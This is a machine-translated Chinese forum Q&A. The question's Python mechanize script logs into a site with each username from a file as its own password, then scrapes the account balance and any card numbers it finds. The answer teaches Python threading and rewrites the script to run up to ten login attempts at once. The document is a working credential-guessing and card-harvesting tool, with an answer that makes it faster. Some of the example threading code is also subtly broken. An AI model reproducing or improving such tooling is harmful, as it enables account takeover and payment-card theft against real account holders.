如何在 python 中使机械化脚本多线程



我 triyng 用 multthread 制作这个脚本没有成功,我是 python 的新手,有人可以帮助我吗?此请求正在工作,但速度太慢。

import mechanize
from bs4 import BeautifulSoup as BS
entrada="entrada.txt"
saida="saida.txt"
def escreve(texto):
    with open(saida, "a") as myfile:
        myfile.write(texto)
with open(entrada) as fp:
    for user in fp:
        try:
            user = user.rstrip()
            cont=1
            br = mechanize.Browser()
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] 
            ua = 'Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 (compatible;)'
            br.set_handle_robots(False)
            br.open("https://site")  
            br.select_form(nr=0)
            br['username']=user
            br['password']= user
            response = br.submit()
            soup = BS(br.response().read(),'lxml')
            value = soup.find_all('a')
            txt = "nConta - Saldo[" + value[2].text+"]n"
            print txt
            escreve(txt)
            response = br.open("https://test/sub/") 
            soup2 = BS(br.response().read(),'lxml')
            txt = "Procurando por cartoes na conta"
            print txt
            escreve(txt)
            for tds in soup2.find_all('td'):
                if (len(tds.text)>30):
                    cc = "CC["+str(cont)+"] ~> " + tds.text+"n"
                    print cc
                    escreve(cc)
                    cont+=1
            txt = "nTotal ["+str(cont-1)+"]n-------------------------------------------------n"
            escreve(txt)
        except Exception: 
            erro =  "n[!]Erro ao logar["+user+"]n-------------------------------------------------n"
            escreve(erro)
            print erro

脚本登录并报废一些信息,此代码工作正常,但太慢。提前感谢!

正如bmcculley所提到的,你可以参考这个问题作为参考,或者你可以参考文档。

如何多线程

Python 中的多线程可以通过 threading 模块完成。您需要知道如何创建线程,如何为您的案例锁定和加入它们。

创建话题

要创建线程,您需要为线程创建一个类。该类将子类threading.Thread

import threading
class MyThread(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        # Your code here

您也可以像普通类一样添加参数。

运行线程

为线程创建

类后,可以创建线程:

thread = MyThread()

并运行它:

thread.start()

锁定多个线程

锁定线程可防止线程同时使用资源。这是您的案例所必需的,因为您的线程将写入saida.txt并打印到标准输出。

假设您有一个线程WriteThread将一些文本写入文件:

import threading
class WriteThread(threading.Thread):
    def __init__(self, text, output):
        threading.Thread.__init__(self)
        self.text = text
        self.output = output
    def run(self):
        output.write(text)
with open("output.txt", "a+") as f:
    # Create threads
    thread_a = WriteThread("foo", f)
    thread_b = WriteThread("bar", f)
    # Start threads
    thread_a.start()
    thread_b.start()

该程序可能仍然可以工作,但允许它们同时访问同一文件不是一个好主意。相反,当thread_a写入文件时,将使用锁来防止thread_b写入文件。

import threading
file_lock = threading.Lock()
class WriteThread(threading.Thread):
    def __init__(self, text, output):
        threading.Thread.__init__(self)
        self.text = text
        self.output = output
    def run(self):
        # Acquire Lock
        file_lock.acquire()
        output.write(text)
        # Release Lock
        file_lock.release()
with open("output.txt", "a+") as f:
    # Create threads
    a = WriteThread("foo", f)
    b = WriteThread("bar", f)
    # Start threads
    a.start()
    b.start()

file_lock.acquire()的意思是线程将等待另一个线程release file_lock,以便它可以使用该文件。

联接多个线程

联接线程是一种将所有线程同步在一起的方法。当多个线程联接时,它们需要等到所有线程都完成才能继续。

假设我有两个线程具有不同的代码执行时间,我希望它们在继续之前完成它们正在执行的任何操作。

import threading
import time
class WaitThread(threading.Thread):
    def __init__(self, time_to_wait, text):
        threading.Thread.__init__(self)
        self.time_to_wait = time_to_wait
        self.text = text
    def run(self):
        # Wait!
        time.sleep(self.time_to_wait)
        print self.text
# Thread will wait for 1 second before it finishes
thread_a = WaitThread(1, "Thread a has ended!")
# Thread will wait for 2 seconds before it finishes
thread_b = WaitThread(2, "Thread b has ended!")
threads = []
threads.append(thread_a)
threads.append(thread_b)
# Start threads
thread_a.start()
thread_b.start()
# Join threads
for t in threads:
    t.join()
print "Both threads have ended!"

在此示例中,thread_a将先打印,然后再打印thread_b打印。但是,只有在打印thread_athread_b后,它才会执行print "Both threads have ended!"

应用

现在,回到你的代码。

除了实现多线程、锁定和连接之外,我还做了不少更改,但整个想法是有两个锁(一个用于打印,一个用于写入文件)并在一定的限制内执行它们。(线程太多不好!参考这个问题)

import mechanize
from bs4 import BeautifulSoup as BS
import threading
# Max no. of threads allowed to be alive.
limit = 10
entrada = "entrada.txt"
saida = "saida.txt"
def write(text):
    with open(saida, "a") as f:
        f.write(text)
# Threading locks
fileLock = threading.Lock()
printLock = threading.Lock()
def print_out(text):
        printLock.acquire()
        print text
        printLock.release()
# Thread for each user
class UserThread(threading.Thread):
    def __init__(self, user):
        threading.Thread.__init__(self)
        self.user = user.rstrip()
    def run(self):
        to_file = ""
        try:
            cont = 1
            # Initialize Mechanize
            br = mechanize.Browser()
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] 
            br.set_handle_robots(False)
            br.open("https://site")
            # Submit form
            br.select_form(nr=0)
            br["username"] = self.user
            br["password"] = self.user
            br.submit()
            # Soup Response
            soup = BS(br.response().read(), "lxml")
            value = soup.find_all("a")
            # Write to file
            txt = "nConta - Saldo["+value[2].text+"]n"
            print_out(txt)
            to_file += txt
            # Retrieve response from another page
            br.open("https://test/sub")
            soup = BS(br.response().read(), "lxml")
            # Write to file
            txt = "Procurando por cartoes na conta"
            print_out(txt)
            to_file += txt

            for tds in soup.find_all("td"):
                if len(tds.text) > 30:
                    # Write to file
                    cc = "CC["+str(cont)+"] ~> "+tds.text+"n"
                    print_out(cc)
                    to_file += cc
                    cont += 1
            txt = "nTotal ["+str(cont-1)+"]n-------------------------------------------------n"
            to_file += txt
        except Exception:
            erro = "n[!]Erro ao logar["+self.user+"]n-------------------------------------------------n"
            to_file += erro
            print_out(erro)
        # Write everything to file
        fileLock.acquire()
        write(to_file)
        fileLock.release()
threads = []
with open(entrada) as fp:
    for user in fp:
        threads.append(UserThread(user))
active_threads = []
for thread in threads:
    if len(active_threads) <= limit:
        # Start threads
        thread.start()
        active_threads.append(thread)
    else:
        for t in active_threads:
            # Wait for everything to complete before moving to next set
            t.join()
        active_threads = []

小编辑:
将所有单引号更改为双引号
在操作员之间和需要
的地方增加间距删除了未使用的变量ua
将未使用的变量response = br.submit()response = br.open("https://test/sub")替换为br.submit()br.open("https://test/sub")

最新更新